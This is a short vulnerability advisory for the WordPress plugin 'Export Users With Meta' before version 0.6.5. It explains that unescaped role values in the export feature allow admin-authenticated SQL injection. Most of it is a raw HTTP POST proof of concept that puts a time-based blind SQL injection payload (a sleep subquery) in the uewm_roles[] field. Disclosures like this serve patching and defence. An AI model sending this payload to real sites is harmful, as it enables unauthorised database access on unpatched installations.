Export Users With Meta < 0.6.5 - Authenticated SQL Injection

The plugin did not escape the list of roles to export before using them in a SQL statement in the export functionality, available to admins, leading to an authenticated SQL Injection.

PoC

POST /wp-admin/users.php?page=uewm_settings HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------91314853327906118943368521591 Content-Length: 1309 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name=“uewm_roles[]” editor’%20AND%20(select*from(select(sleep(10)))a)+’ -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name=“uewm_use_custom_csv_settings” 1 -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name=“uewm_field_separator” custom -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name=“uewm_custom_field_separator” = -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name=“uewm_text_qualifier” double-quote -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name=“uewm_custom_text_qualifier” " -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name=“save” Save changes -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name=“_wpnonce” 0c475bfd14 -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name=“_wp_http_referer” /wp-admin/users.php?page=uewm_settings -----------------------------91314853327906118943368521591–